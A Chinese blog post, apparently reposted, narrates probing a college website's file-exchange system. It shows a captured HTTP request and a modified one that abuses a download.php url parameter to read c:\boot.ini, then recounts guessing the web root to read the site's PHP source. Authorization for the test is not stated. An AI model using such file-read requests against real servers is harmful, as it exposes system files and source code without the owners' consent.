记一次对某学院网站的安全检测过程

导读：有了小的缺口可能导致整个服务器群的沦陷！安全无小事！由于在校期间课余在学校的网络工作室工作，所以对一些学校网站的服务和发展比较关注。此次安全检测过去有段时间了，一直想写成稿子就是没有时间，具体环境可能有所淡忘，但整个过程和思路还是很明了的。这期间发现某学院的文件交换系统非常的不错，在校园网内使用会带来很多方面的便捷。搜索了下网上没有现成的 系统下载，难道非要自己现写不成…

踩点：

服务器开放了21和80端口，Serv-U6.2、 Apache/2.055(win32)PHP/5.1.2；同台服务器上还有一个OA系统。黑盒测试，先是测试上传脚本文件，可以上传，得到提取码后进 行提取不会被解析…，对上传过程进行抓包，然后构造不存在的文件，发包，也没有暴出任何敏感信息。对整个的交换系统进行文件扫描也就扫出个 config.php，google了下也没有别的文件。刚才不是说还有个OA 系统吗，google OA的时候确实有动态的连接，但所有的连接首先判断是不是校内IP，如果非校内IP直接跳转一个登陆页面，到这里测试完全的陷入了僵局。几经的离开，几经 的回来再测试都没有结果，难道真的拿不下它吗？再一次的测试时输入提取码后的下载地址吸引了我。
“hxxp://www.xxx.edu.cn/ex/download.php?url=exchanging%2F200709121626171664123.jpg&name=dff3badd8b57fee777c63871.jpg”
url后应该是个绝对地址，那么修改下会不会下到别的文件？

抓包：

GET /ex/download.php?url=exchanging%2F200709121626171664123.jpg&name=dff3badd8b57fee777c63871.jpg
HTTP/1.1
Accept: */*
Referer: hxxp://www.xxx.edu.cn/ex/down.php
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.1)
Host: www.xxx.edu.cn
Connection: Keep-Alive
Cookie: down_fail_cnt=0
一般WIN32下PHP继承的SYS权限，所以读文件干脆就读c:\boot.ini，Telnet 服务器ip 80发送下面修改好的数据
修改：
/ex/download.php?url=c%3A%5Cboot.ini HTTP/1.1
Accept: */*
Referer: hxxp://www.xxx.edu.cn/ex/down.php
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.1)
Host: www.xxx.edu.cn
Connection: Keep-Alive
Cookie: down_fail_cnt=0
结果真的返回了boot.ini的内容，狂喜中！
紧接着下来的问题就是猜web目录的路径了，找PHP或者Apache的配置文件应该都能找到WEB的路径，还是上面的发包，当试到路径 d:\wwwroot\ex时，没有返回错误信息，说明猜对了他的路径，然后就是读交换系统的文件代码了，代码都是相关联的，发现就7个php文件而且用 这个系统根本拿不到shell。

转截请注明:文章来自 pc捍卫者 http://www.pchwz.com 本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点